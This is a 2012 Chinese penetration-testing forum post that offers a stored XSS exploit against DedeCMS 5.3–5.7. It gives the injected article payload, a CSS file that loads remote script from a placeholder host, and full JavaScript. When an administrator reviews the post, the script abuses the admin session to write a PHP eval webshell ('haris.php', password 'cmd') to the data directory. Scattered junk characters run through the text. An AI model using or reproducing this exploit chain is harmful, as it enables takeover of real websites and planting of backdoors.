找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2630|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
! c- v8 X0 k0 }; Z" O) z为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)5 R, ~' k/ S  i
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
  Q8 r0 y8 U% G# ~6 Q下面说说利用方法。
" m( U/ T7 z; u. W/ c+ n条件有2个:9 U, X; m7 O" ]1 r5 s3 w2 Y! x. q
1.开启注册
! q0 Q  h5 A# `, `2.开启投稿& Y4 y$ W$ m9 e  {
注册会员----发表文章' w! ^; d) ^, k& {; d, b
内容填写:
; p$ k8 b5 N2 G# R3 l1 |复制代码; P) f! A: y- T' V/ I* H! J/ G
<style>@im\port'\http://xxx.com/xss.css';</style>
- s9 [2 U% q9 I8 x1 d. y4 F6 y0 ^新建XSS.Css( X$ T. N+ \) P: t
复制代码
# k7 W( b- \, x. O.body{: u5 I, f4 w+ P2 u% H; s% g# f
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
8 A: D/ X: p* W$ p6 p6 i- b. ]新建xss.js 内容为
  d- Z: P* @! y* s7 C" G复制代码/ M8 Q# ]/ l# Z" P( i+ `# e
1.var request = false;
* ^1 T# ^" ^8 @/ K7 r( G2.if(window.XMLHttpRequest) {
) M( ^& _6 I' X- o; T% h0 N3.request = new XMLHttpRequest();
! N4 {+ r0 W8 b1 c) O4.if(request.overrideMimeType) {
8 J4 M$ b4 e- k4 K3 m5.request.overrideMimeType('text/xml');# s. G8 n- l5 O+ E# T) L  J1 u* Q
6.}( D  S: p1 q- c7 `! i0 F
7.} else if(window.ActiveXObject) {
& g  L/ n# n+ y" w" J' I2 o+ W8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];- r6 r- r9 m* B, I. M) `( d0 Z
9.for(var i=0; i<versions.length; i++) {
1 f/ ?: a1 F! Q% t10.try {: t  a/ t6 B$ ^% t7 K7 P" r% l" v
11.request = new ActiveXObject(versions);/ }/ F7 v$ b* ~/ i
12.} catch(e) {}, r- w0 W1 Y1 P% q* K
13.}* r6 k6 o8 c5 r& i
14.}
3 G4 a4 _! N1 k, |15.xmlhttp=request;
2 c( [( B4 N3 s3 S- ]16.function getFolder( url ){
; I! Y) B. ~; {2 w; i17. obj = url.split('/')
+ M# {  B- t! @6 @' F18. return obj[obj.length-2]! D: a; k: q1 c+ q
19.}# Z% S& g$ s: h9 |% Z6 u
20.oUrl = top.location.href;' o( T" X3 ~% s4 k9 j! C
21.u = getFolder(oUrl);5 C( @/ u# S# J0 s
22.add_admin();/ A  Y* F' z7 _; p$ B
23.function add_admin(){
4 W* ^, L, q. A) C, G' ]24.var url= "/"+u+"/sys_sql_query.php";
8 Y8 X% f  @/ A5 }. A4 R0 j2 M25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
0 ?+ T/ n8 R) A! H8 e! ?2 _9 @26.xmlhttp.open("POST", url, true);. m& L: g' M& p, p# G8 G
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");9 ], x4 v. }5 V5 \7 j
28.xmlhttp.setRequestHeader("Content-length", params.length);. R! V8 A# f- F! f6 d$ E- z
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
- @& X% C) L3 M) j30.xmlhttp.send(params);# o) M( N* R% V) x, n4 M
31.}) B. g1 {5 R5 R* t
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表